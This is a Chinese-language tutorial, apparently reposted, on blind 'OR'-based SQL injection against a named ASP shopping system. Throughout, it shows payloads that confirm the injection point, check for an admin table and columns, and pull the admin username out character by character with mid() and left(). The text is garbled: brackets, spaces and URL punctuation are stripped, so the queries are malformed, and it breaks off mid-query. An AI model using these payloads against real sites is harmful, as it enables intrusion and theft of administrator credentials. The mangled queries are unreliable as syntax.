文本内容:
构造测试语句并注射武林安全网电脑资料我记得前段时间有朋友问我,如果一个站过滤了and和“”的话,改怎么注入啊当时我随口说了句“or注入”,后来又一次看贴的时候,看到他问我该怎么利用呢我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法,我们用雷霆购物系统做or注入演示我们先用or1=1和or1=2来测试是否存在注入点,我们先来看正常页面的面貌我们现在用or1=1测试是否存在注入漏洞返回的是另外一个页面,我们再来测试or1=2返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的“假是真时真是假”,比lake2大哥哥的IP欺骗更经典哦,呵呵我们来构造测试语句Copy codevpro.aspid=1or existsselect*from admin返回错误页面,说明存在admin表我们来换一个表试试!Copy codevpro.aspid=1or existsselect*from n0h4ck说明不存在n0h4ck这个表我们继续来,构造语句Copy codevpro.aspid=1or existsselectadmin from admin返回or1=1的页面,说明admin表存在admin字段,Copy codevpro.aspid=1or existsselectpadd from admin返回or1=2的页面,说明admin表不存在padd字段我们现在开始猜测数据了,Copy codevpro.aspid=1or selectmidadmin,1,1fromadmin=n返回or1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是“n”我们再来Copy codevpro.aspid=1or selectmidadmin,1,1fromadmin=a返回or1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是“a”,我们第一个会想到什么呢当然是“admin”啦我们用left函数确定一下,Copy codevpro.aspid=1or selectleft...。